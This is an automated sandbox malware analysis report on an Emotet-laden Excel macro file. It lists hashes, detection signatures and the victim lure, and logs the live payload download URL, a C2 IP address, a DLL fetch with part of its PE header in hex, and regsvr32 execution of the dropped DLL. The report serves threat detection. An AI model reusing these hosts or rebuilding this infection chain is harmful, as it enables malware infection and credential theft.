Windows Analysis Report
qd_34768.xlsm

Overview

General Information

Sample Name: qd_34768.xlsm
Analysis ID: 601134
MD5: 07f30f1fa5420f050ea5929af0f95265
SHA1: 6310b51fca4003fb36252367f058c2e990ba5734
SHA256: 48f3ef54ff2ed0b44d5e4836c56a3a8f3214d7214278172ef84166f6d42cc067
Tags: xlsm
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Network Activity
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected MalDoc1
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sigma detected: Excel Network Connections
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Yara detected Xls With Macro 4.0
Potential key logger detected (key state polling based)
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Excel documents contains an embedded macro which executes code when the document is opened
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: qd_34768.xlsm ReversingLabs: Detection: 40%
Antivirus detection for URL or domain
Source: http://eles-tech.com/css/KzMysMqFMs/ Avira URL Cloud: Label: malware
Source: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnurar Avira URL Cloud: Label: malware
Source: https://68.183.94.239/ Avira URL Cloud: Label: malware
Source: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnural Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: eles-tech.com Virustotal: Detection: 9% Perma Link
Source: http://eles-tech.com/css/KzMysMqFMs/ Virustotal: Detection: 10% Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100492F7 FindFirstFileA,FindClose, 3_2_100492F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100489BD __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 3_2_100489BD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004168D2 FindFirstFileW, 5_2_004168D2

Software Vulnerabilities
barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: eVzUZ7dv5zBAXa5[1].dll.0.dr Jump to dropped file
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\xewn.dll Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: eles-tech.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.46.40.47:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.46.40.47:80

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 68.183.94.239 80 Jump to behavior
Yara detected MalDoc1
Source: Yara match File source: sharedStrings.xml, type: SAMPLE
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: TELLCOM-ASTR TELLCOM-ASTR
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 31 Mar 2022 20:52:02 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Thu, 31 Mar 2022 20:52:02 GMTContent-Disposition: attachment; filename="eVzUZ7dv5zBAXa5.dll"Content-Transfer-Encoding: binarySet-Cookie: 6246147296b82=1648759922; expires=Thu, 31-Mar-2022 20:53:02 GMT; Max-Age=60; path=/Last-Modified: Thu, 31 Mar 2022 20:52:02 GMTContent-Length: 868352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 19 fc 6d bc 5d 9d 03 ef 5d 9d 03 ef 5d 9d 03 ef 0b 82 10 ef 78 9d 03 ef 5d 9d 03 ef 65 9d 03 ef 3f 82 10 ef 4e 9d 03 ef 5d 9d 02 ef 88 9c 03 ef de 81 0d ef 46 9d 03 ef b5 82 09 ef d6 9d 03 ef e5 9b 05 ef 5c 9d 03 ef b5 82 08 ef df 9d 03 ef b5 82 07 ef 5c 9d 03 ef 52 69 63 68 5d 9d 03 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 a7 31 46 62 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 90 07 00 00 f0 05 00 00 00 00 00 10 a9 01 00 00 10 00 00 00 a0 07 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 0d 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 d5 08 00 ae 01 00 00 00 80 09 00 04 01 00 00 00 c0 09 00 33 34 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 5c 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 8c 09 00 a0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 8e 07 00 00 10 00 00 00 90 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4e 37 01 00 00 a0 07 00 00 40 01 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 98 00 00 00 e0 08 00 00 50 00 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 e5 3c 00 00 00 80 09 00 00 40 00 00 00 30 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 33 34 03 00 00 c0 09 00 00 40 03 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 47 89 00 00 00 00 0d 00 00 90 00 00 00 b0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /css/KzMysMqFMs/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: eles-tech.comConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.5.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://68.183.94.239/
Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnural
Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnurar
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F230AC8.jpg Jump to behavior
Source: unknown DNS traffic detected: queries for: eles-tech.com
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00405D75 InternetReadFile, 5_2_00405D75
Source: global traffic HTTP traffic detected: GET /css/KzMysMqFMs/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: eles-tech.comConnection: Keep-Alive
Potential key logger detected (key state polling based)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1003BD55 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent, 3_2_1003BD55
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10044296 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 3_2_10044296
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1004697A GetKeyState,GetKeyState,GetKeyState,GetKeyState, 3_2_1004697A

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 5.2.regsvr32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.3c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
Source: Screenshot number: 8 Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ::
Source: Screenshot number: 8 Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 :: -Aj 19 20 21 22 23
Found malicious Excel 4.0 Macro
Source: qd_34768.xlsm Macro extractor: Sheet: PIMKE contains: URLDownloadToFileA
Source: qd_34768.xlsm Macro extractor: Sheet: PIMKE contains: URLDownloadToFileA
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\xewn.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: qd_34768.xlsm Initial sample: EXEC
Source: qd_34768.xlsm Initial sample: EXEC
Creates files inside the system directory
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\Windows\SysWOW64\Onodwrlgmyciiaw\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1002D9F0 3_2_1002D9F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10027A87 3_2_10027A87
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10017A8D 3_2_10017A8D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10017C6A 3_2_10017C6A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100203BE 3_2_100203BE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10042F7D 3_2_10042F7D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C25E7 3_2_003C25E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DE978 3_2_003DE978
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D8BA1 3_2_003D8BA1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C8ED3 3_2_003C8ED3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CB1A1 3_2_003CB1A1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D31D5 3_2_003D31D5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D39B8 3_2_003D39B8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D7A53 3_2_003D7A53
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DFADC 3_2_003DFADC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C5AC9 3_2_003C5AC9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CDF44 3_2_003CDF44
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C3F40 3_2_003C3F40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DC064 3_2_003DC064
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C2050 3_2_003C2050
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D609A 3_2_003D609A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D815D 3_2_003D815D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CC14C 3_2_003CC14C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DA1B1 3_2_003DA1B1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C62BA 3_2_003C62BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DE2E1 3_2_003DE2E1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CC388 3_2_003CC388
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DA455 3_2_003DA455
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D44A7 3_2_003D44A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C4497 3_2_003C4497
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CE4E2 3_2_003CE4E2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DE4E3 3_2_003DE4E3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D0552 3_2_003D0552
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DC5E5 3_2_003DC5E5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DE63C 3_2_003DE63C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D2606 3_2_003D2606
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003E06E7 3_2_003E06E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D46DD 3_2_003D46DD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D86C1 3_2_003D86C1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CC7B4 3_2_003CC7B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003E0887 3_2_003E0887
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D4930 3_2_003D4930
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C4949 3_2_003C4949
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C89F6 3_2_003C89F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DA9EE 3_2_003DA9EE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D0A27 3_2_003D0A27
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003E0A1E 3_2_003E0A1E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CEA8C 3_2_003CEA8C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D6B98 3_2_003D6B98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D0B84 3_2_003D0B84
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CEC5D 3_2_003CEC5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D2CAC 3_2_003D2CAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C4D13 3_2_003C4D13
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C4E03 3_2_003C4E03
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C2E8C 3_2_003C2E8C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D8EF4 3_2_003D8EF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DEECF 3_2_003DEECF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C6F64 3_2_003C6F64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CAF67 3_2_003CAF67
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DAFB1 3_2_003DAFB1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D0F87 3_2_003D0F87
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CD0F7 3_2_003CD0F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DB1BA 3_2_003DB1BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C51B7 3_2_003C51B7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D51F0 3_2_003D51F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C323D 3_2_003C323D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D92F0 3_2_003D92F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C7336 3_2_003C7336
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C53F6 3_2_003C53F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C9400 3_2_003C9400
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DF571 3_2_003DF571
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D75E7 3_2_003D75E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DB605 3_2_003DB605
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DF6AE 3_2_003DF6AE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C5717 3_2_003C5717
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CB7B5 3_2_003CB7B5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CF88D 3_2_003CF88D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CD933 3_2_003CD933
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C192C 3_2_003C192C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C7AB6 3_2_003C7AB6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CDAE6 3_2_003CDAE6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C1B3F 3_2_003C1B3F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C9B4C 3_2_003C9B4C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C9C3D 3_2_003C9C3D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DDC64 3_2_003DDC64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D7CA5 3_2_003D7CA5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D1DCF 3_2_003D1DCF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D3E98 3_2_003D3E98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CFEF2 3_2_003CFEF2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CBF6E 3_2_003CBF6E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DFF4A 3_2_003DFF4A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C5FA3 3_2_003C5FA3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DDFCE 3_2_003DDFCE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00247A53 4_2_00247A53
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00235AC9 4_2_00235AC9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00238ED3 4_2_00238ED3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024FADC 4_2_0024FADC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024E978 4_2_0024E978
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00233F40 4_2_00233F40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023DF44 4_2_0023DF44
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00240552 4_2_00240552
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023B1A1 4_2_0023B1A1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00248BA1 4_2_00248BA1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002439B8 4_2_002439B8
